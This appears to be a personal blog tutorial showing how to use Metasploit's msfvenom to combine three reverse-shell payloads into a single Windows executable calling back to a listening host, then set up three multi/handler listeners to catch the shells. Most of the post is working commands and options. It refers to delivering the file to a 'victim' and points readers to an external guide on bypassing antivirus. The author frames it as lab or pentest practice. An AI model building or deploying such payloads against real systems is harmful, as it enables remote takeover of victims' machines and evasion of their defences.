Today is a quick example of using msfencode. This is strictly the way i use it, there are more than likely better ways and methods. But this works for me. Hopefully you enjoy it. So here goes..
All of you may have heard and or used msfpayload and msfencode. But what you may not be aware of is msfvenom. Which is basically a replacement for two. As said before, this is only the way i use it. So first thing first, by running the msfvenom with no commands, you are shown the help information. This is shown below.
Now as you see, there are many options. I personally first decide what payload im going to use, by opening another terminal and running msfpayload -l |grep "whatever your looking for" so for instance: ./msfpayload -l |grep windows/meterpreter/reverse Which would give you output as seen below.
Now as you can see, we have a few payloads to choose from. I will be using the windows/meterpreter/reverse_tcp
So moving back to the terminal with msfvenom, i would utilize the following commands, the commands will be explained below.
./msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.116 LPORT=4444 -f raw > /tmp/pay1
Command explanation:
-p: chosen payload
LHOST=: the listening host
LPORT=: the listening port
-f: the format that you want your payload to be encoded as
raw: the reason I have used this, is i have intentions of adding this payload along with another one. So we dont want it encoded just yet. So basically its staying as shellcode for the time being
> /tmp/pay1 : telling msfvenom where to store our payload for later use.
Now go on to decide what your next payload you will use will be. So refer back to the msfpayload terminal and chose your next payload. I will be using the windows/shell/reverse_tcp
so my next commands within the msfvenom terminal would be as follows.
./msfvenom -p windows/shell/reverse_tcp -f raw LHOST=192.168.1.116 LPORT=4443 -c /tmp/pay1 -k > /tmp/pay2
command explanation:
-p: the payload to use
-f: format to keep the payload in.
LHOST=: the listening host
LPORT=: the Listening port
-c: telling msfvenom that you want to combine extra shell code to the current payload. ensure you give full path to this shellcode"payload" to add.
-k: to keep the payload working by running it within another thread.
Now decide on a third payload. I do this by refering back to my msfpayload terminal and pick from there. I will be using the windows/shell/reverse_tcp_allports so the commands will look like below. Remember to pay attention, because now we will be adding the payloads together and having the format be an executable.
./msfvenom -p windows/meterpreter/reverse_tcp_allports -f exe LHOST=192.168.1.116 LPORT=2 -c /tmp/pay2 > /tmp/pay3.exe
commands explained:
-p: the payload to be used
-f: the format for your payload
LHOST=: the listening host.
LPORT=: the listening port.
-c: telling msfvenom to add some shell code. be sure to give full path to the shell code you wanna add.
below is a picture of all three commands in succession.
Now you have three payloads in one. So you will need to setup three listeners. What i do, is open up three terminals and load msfconsole using the commands as followed:
cd /pentest/exploits/framework
./msfconsole
Just doing that three times will get you three different msfconsole sessions. now to setup listeners. Pick a terminal and do the following.
use exploit/multi/handler
now tell it what to listen for. so our first payload had the following options so... just input these in with the following commands
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.116 <----or whatever your LHOST will be
set LPORT 4444 <----or whatever your LPORT will be
show options <----just to check all your options are set correctly.
exploit <----if all options were set correctly, using the exploit command will set your listener to start listening.
Now a new msfconsole session for our second payload, using the commands as followed.
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.1.116 <----or whatever your LHOST will be
set LPORT 4443 <----or whatever your LPORT will be
show options <----just to check all your options are set correctly.
exploit <----if all options were set correctly, using the exploit command will set your listener to start listening.
Now onto listener three. In your thied msfconsole session input the following.
set PAYLOAD windows/meterpreter/reverse_tcp_allports
set LHOST 192.168.1.116 <----or whatever your LHOST will be
set LPORT 2 <----or whatever your LPORT will be
show options <----just to check all your options are set correctly.
exploit <----if all options were set correctly, using the exploit command will set your listener to start listening.
Now all thats left is to get your executable over to your victim. This would take imagination in a real world pentest. But since im only testing. I simple copy it over to my webserver and download the executable to my Virtual machine. Then run it. If all went well, you will get three seperate shells. This could certainly be useful in situations of, wanting to send a shell to different machines. IE you could have multiple LHOSTs. Or if your not sure what type of egress rulsets are in place. But all in all. Its an amazing feature. Now notice, i didnt do any encoding, to bypass AV. Thats because i will send you to a great write up on bypassing anti-virus using a simaliar method. So if you take my "guide by example" and the following guide from http://www.fuzzysecurity.com/tutorials/3.html you should see some great results. I hope you enjoyed this quickly put together post. Please feel free to tell me what youd like to see next. as always, goodnight and good luck.
http://www.fuzzysecurity.com/tutorials/3.html <---check this out for encoding and bypassing Anti-virus
No comments:
Post a Comment